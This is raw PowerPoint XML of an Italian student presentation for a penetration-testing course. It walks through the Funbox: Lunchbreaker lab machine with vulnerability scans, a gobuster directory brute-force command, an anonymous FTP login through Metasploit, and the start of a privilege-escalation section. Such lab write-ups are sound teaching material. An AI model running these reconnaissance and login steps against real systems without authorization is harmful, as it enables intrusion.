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312" r:id="rId5"/>
    <p:sldId id="316" r:id="rId6"/>
    <p:sldId id="330" r:id="rId7"/>
    <p:sldId id="337" r:id="rId8"/>
    <p:sldId id="332" r:id="rId9"/>
    <p:sldId id="338" r:id="rId10"/>
    <p:sldId id="342" r:id="rId11"/>
    <p:sldId id="320" r:id="rId12"/>
    <p:sldId id="341" r:id="rId13"/>
    <p:sldId id="339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35" r:id="rId28"/>
    <p:sldId id="336" r:id="rId2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C1603A-64C3-4137-97A6-3D10ECA62BF6}" type="datetime1">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>11/06/2024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FC685-2169-447E-B5F0-6D799AEBC2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404E7F-38DC-4C61-8CC6-BB9B060413E8}" type="datetime1">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>11/06/2024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926890-3464-4466-B789-5BB6DD4ADC9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17F66C-500D-4981-B809-13366AEEA2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A9BDE53-4B04-460A-9A18-C647766E335A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146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215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182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175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2609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4767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472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611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7092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19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19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230EBB7-5CFA-45E6-8575-F66DFFA01E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431650C-4038-4D6B-97F6-24EE64C74274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79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21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9293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22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2358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23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0571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CA276C-7B96-44FE-B2FC-680377932C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4CE7D3D-D3A7-4C65-B42F-59EB1D7721BA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685201-0ACF-435B-8F75-048365093A6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9A146B6-FD76-4C11-B40B-18983E976FB6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BEF733-CDEB-4A6F-A382-56843A30D0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9443B7B-646F-4762-A2A2-668EBF4BB5FC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BEF733-CDEB-4A6F-A382-56843A30D0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9443B7B-646F-4762-A2A2-668EBF4BB5FC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280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212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115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926890-3464-4466-B789-5BB6DD4ADC9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4DC464-3DB7-42FA-8E53-C5142AFF37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4BCF33B-0FF2-4536-A379-CBC73A60B482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173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617778-69A3-4D86-BC8C-7A2E675998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F43614-B7E7-4922-85C5-EDB90B9C11FF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617778-69A3-4D86-BC8C-7A2E675998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F43614-B7E7-4922-85C5-EDB90B9C11FF}" type="datetime1">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>11/06/2024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37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igura a mano libera: Forma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5" name="Figura a mano libera: Forma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>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill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ttangolo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ttangolo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 useBgFill="1">
        <p:nvSpPr>
          <p:cNvPr id="79" name="Rettangolo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80" name="Titolo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 rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4800" b="1" spc="1500" baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>FARE CLIC PER INSERIRE IL TITOLO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Sottotitolo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 rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2400" spc="400" baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>FARE CLIC PER AGGIUNGERE IL SOTTOTITOLO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3" name="Figura a mano libera: Forma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4" name="Figura a mano libera: Forma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86" name="Elemento grafico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igura a mano libera: Forma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>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="88" name="Figura a mano libera: Forma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>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="89" name="Figura a mano libera: Forma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>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="90" name="Figura a mano libera: Forma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>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="91" name="Figura a mano libera: Forma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e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96" name="Segnaposto immagine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 rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Fare clic per aggiungere una foto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olo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 rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buNone/>
              <a:defRPr sz="2400" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Fare clic per inserire il titolo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dirty="0"/>
              <a:t>Fare clic per inserire il testo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 rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buNone/>
              <a:defRPr sz="2400" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0" rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per inserire il titolo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Segnaposto testo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20" name="Segnaposto data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Segnaposto piè di pagina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22" name="Segnaposto numero diapositiva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Elemento grafico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olo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29" name="Segnaposto testo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 dirty="0"/>
              <a:t>Fare clic per inserire il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dirty="0"/>
              <a:t>Fare clic per inserire il testo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Segnaposto testo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Fare clic per inserire il titolo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Segnaposto testo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3" name="Segnaposto testo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Fare clic per inserire il titolo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Segnaposto testo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 rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1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20" name="Segnaposto data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Segnaposto piè di pagina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22" name="Segnaposto numero diapositiva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Elemento grafico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igura a mano libera: Forma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igura a mano libera: Forma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olo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 anchor="b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it-IT"/>
              <a:t>Contenuto</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Segnaposto data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Segnaposto immagine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Segnaposto piè di pagina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22" name="Segnaposto numero diapositiva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ttangolo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 rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4000" b="1" spc="1500" baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>FARE CLIC PER INSERIRE IL TITOLO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 rtlCol="0"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pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>FARE CLIC PER AGGIUNGERE IL SOTTOTITOLO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Segnaposto immagine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 rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per aggiungere una foto</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Elemento grafico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Segnaposto data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Segnaposto piè di pagina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24" name="Segnaposto numero diapositiva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olo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 anchor="b">
            <a:norm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5" name="Segnaposto immagine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it-IT"/>
              <a:t>Fare clic per aggiungere una foto</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="298" name="Segnaposto contenuto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>
            <a:lvl1pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per inserire il testo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Elemento grafico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igura a mano libera: Forma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  <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="263" name="Figura a mano libera: Forma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</p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="264" name="Elemento grafico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igura a mano libera: Forma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  <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="266" name="Figura a mano libera: Forma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</p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="299" name="Segnaposto data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01/02/20XX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="Segnaposto piè di pagina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/>
              <a:t>TITOLO PRESENTAZIONE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="Segnaposto numero diapositiva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 anchor="b">
            <a:norm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 rtl="0">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per inserire il testo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="Segnaposto immagine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it-IT"/>
              <a:t>Fare clic per aggiungere una foto</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="Segnaposto immagine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 rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per aggiungere una foto</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="Segnaposto data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it-IT"/>
              <a:t>01/02/20XX</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="Segnaposto piè di pagina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/>
              <a:t>TITOLO PRESENTAZIONE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="Segnaposto numero diapositiva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5EA792F7-1D9E-4C7E-A103-E8EDFDC2691E}" type="slidenum">
              <a:rPr lang="it-IT" noProof="0" smtClean="0"/>
              <a:t>‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Elemento grafico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Elemento grafico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Elemento grafico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Elemento grafico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Elemento grafico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igura a mano libera: Forma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olo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 rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="3600" b="1" spc="1500" baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>FARE CLIC</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>PER INSERIRE IL TITOLO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Sottotitolo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 rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2400" spc="400" baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>FARE CLIC PER AGGIUNGERE IL SOTTOTITOLO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Elemento grafico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Elemento grafico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Segnaposto immagine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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Elemento grafico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Elemento grafico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olo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90" name="Segnaposto data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Segnaposto piè di pagina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192" name="Segnaposto numero diapositiva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Elemento grafico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rtlCol="0" anchor="t"/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1" name="Segnaposto data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Segnaposto piè di pagina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33" name="Segnaposto numero diapositiva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rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr"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6" name="Segnaposto testo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 rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1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Segnaposto data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Segnaposto piè di pagina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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Elemento grafico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egnaposto numero diapositiva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igura a mano libera: Forma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e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Segnaposto data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Segnaposto piè di pagina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63" name="Segnaposto numero diapositiva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Elemento grafico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Elemento grafico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olo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9" name="Segnaposto data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01/02/20XX</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="it-IT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Segnaposto piè di pagina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0" u="none" strike="noStrike" kern="1200" cap="all" spc="100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TITOLO PRESENTAZIONE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Segnaposto numero diapositiva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it-IT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1200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="all" spc="10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it-IT"/>
              <a:t>01/02/20XX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r>
              <a:rPr lang="it-IT"/>
              <a:t>TITOLO PRESENTAZIONE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pPr rtl="0"/>
            <a:fld id="{5EA792F7-1D9E-4C7E-A103-E8EDFDC269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pngall.com/cybersecurity-p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cybersecurity-pn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icpedia.org/post-it-note/c/cybersecurity.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nexsys.it/blog/importanza-della-cybersecurity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ndustrywired.com/10-cybersecurity-and-data-privacy-predictions-for-the-21st-centur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ngall.com/cybersecurity-png/download/404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olo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4"/>
            <a:ext cx="4574731" cy="3120147"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" spc="-150" dirty="0" err="1"/>
              <a:t>Funbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" spc="-150" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" spc="-150" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" spc="-150" dirty="0" err="1"/>
              <a:t>Lunchbreaker</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" spc="-150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Sottotitolo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it-IT" dirty="0"/>
              <a:t>Raffaella Calò </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>mat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>. 0522501436</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Corso di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Penetration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Testing and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Ethical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Hacking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4EE6E687-5325-42C2-817F-ED9AE11FE2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379210" y="1937582"/>
            <a:ext cx="3666197" cy="3391502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B9EAE15-F7B7-CBED-EB8E-101B59159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5" y="5442012"/>
            <a:ext cx="1490514" cy="14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r>
              <a:rPr lang="it-IT" sz="3200" dirty="0" err="1"/>
              <a:t>Nessus</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="32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10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292784"/>
            <a:ext cx="960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 err="1"/>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="0" dirty="0"/>
              <a:t> è un software adoperato per la scansione di vulnerabilità su singole macchine oppure su intere porzioni di rete. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="0" dirty="0"/>
              <a:t>In questo caso è stata eseguita una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0"/>
              <a:t>Basic Network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="0" dirty="0"/>
              <a:t>verso la macchina </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="0" i="1" dirty="0" err="1"/>
              <a:t>Lunchbreaker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="0" dirty="0"/>
              <a:t>, il che ha portato ai seguenti risultati:</a:t>
            </a:r>
          </a:p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4E4ABDD-89EA-2FE9-1631-4BE75B98C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838" y="2477729"/>
            <a:ext cx="6100283" cy="38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7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r>
              <a:rPr lang="it-IT" sz="3200" dirty="0" err="1"/>
              <a:t>OpenVas</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="32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11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 err="1"/>
              <a:t>OpenVas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="0" dirty="0"/>
              <a:t> è un framework di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="0" dirty="0" err="1"/>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="0" dirty="0"/>
              <a:t> mapping per la scansione delle vulnerabilità e la gestion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>e della sicurezza delle reti.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="0" dirty="0"/>
              <a:t>In questo caso è stata eseguita una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>OpenVas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0"/>
              <a:t> Default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="0" dirty="0"/>
              <a:t>verso la macchina </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="0" i="1" dirty="0" err="1"/>
              <a:t>Lunchbreaker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="0" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6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2739703E-AE38-D46D-663D-AC68C9AE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57" y="2631256"/>
            <a:ext cx="7485286" cy="27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9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r>
              <a:rPr lang="it-IT" sz="3200" dirty="0"/>
              <a:t>Sintesi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12</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT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BE1D48-7C89-0015-B711-55E5B61A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168" y="2658397"/>
            <a:ext cx="4523624" cy="33896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19115EF-32B0-1C5A-A350-B8CDF456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406" y="1707805"/>
            <a:ext cx="6325148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4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r>
              <a:rPr lang="it-IT" sz="3200" dirty="0"/>
              <a:t>Vulnerabilità WEB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13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Dato che la macchina target espone servizi sulla porta 80, verifichiamo la possibile esposizione di informazioni sensibili attraverso il tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>gobuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> con tecniche di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0" err="1"/>
              <a:t>bruteforcing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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DCBF1D8-4620-5EC5-B85D-D896A15B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93" y="3027646"/>
            <a:ext cx="3840813" cy="332870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521B2E-7D0A-B6C2-2682-5E771D1AB6AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2761615" y="2097118"/>
            <a:ext cx="666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gobuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> dir -u http://10.0.2.4 -x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>html,txt,php,bak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> -w /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>wordlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>/common.txt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4C42F3-A038-577D-4AB6-69F544C4D1BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9430382" y="2097118"/>
            <a:ext cx="2536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u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>: URL oggetto di scansione;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x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>: estensioni del file da cercare;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w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>wordlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> da utilizzare per l’attacco di forza bruta.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74A340B2-ECCE-C24A-6A50-A7A9D7E35231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7679741" y="1159706"/>
            <a:ext cx="166899" cy="33343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90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r>
              <a:rPr lang="it-IT" sz="3200" dirty="0"/>
              <a:t>Vulnerabilità WEB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14</a:t>
            </a:fld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CF4DAD-0EAD-89A3-9F79-D2E2BB40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61" y="2140863"/>
            <a:ext cx="5273497" cy="36701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CBCEE13-876C-2A87-33BE-24C89542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86" y="2140863"/>
            <a:ext cx="5273497" cy="110347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3EE317-B304-3338-FA90-3C8AACFC2AE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1979931" y="1595485"/>
            <a:ext cx="2622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index.html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49218F-A385-F2DD-2A1F-D9A805BFA941}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8094406" y="1595486"/>
            <a:ext cx="1708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robots.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4055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044881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Target Exploitation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" sz="32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15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provare ad accedere alla macchina, sfruttiamo la vulnerabilità </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>Anonymous FTP Login Reporting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>con l’aiuto del framework </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Utilizzando il modulo ausiliario </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>ftp_login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, riusciamo ad eseguire il login anonimo modificando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0" err="1"/>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0"/>
              <a:t> di destinazione</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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8CD61B-2E6B-ECD1-6924-DBEB24EF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79" y="2615859"/>
            <a:ext cx="5955602" cy="19650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E137C5-4409-0F37-785D-1A9784DA39D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292866" y="4837472"/>
            <a:ext cx="960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Successivamente, effettuiamo l’accesso al server FTP utilizzando le stesse credenziali anonime.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="356879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044881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dirty="0"/>
              <a:t>Target Exploitation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" sz="32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16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6" y="4024652"/>
            <a:ext cx="960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Siamo riusciti ad ottenere l’accesso alla macchina target.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E137C5-4409-0F37-785D-1A9784DA39D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292866" y="1209368"/>
            <a:ext cx="960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Successivamente, effettuiamo l’accesso al server FTP utilizzando le stesse credenziali anonime.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703A7A6-02E9-2C19-8072-863DDC39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68" y="1691897"/>
            <a:ext cx="6322257" cy="18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3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Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0"/>
              <a:t> Escalation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17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Analizzando il file index.html, riusciamo ad individuare dei possibili </a:t>
            </a:r>
            <a:r>
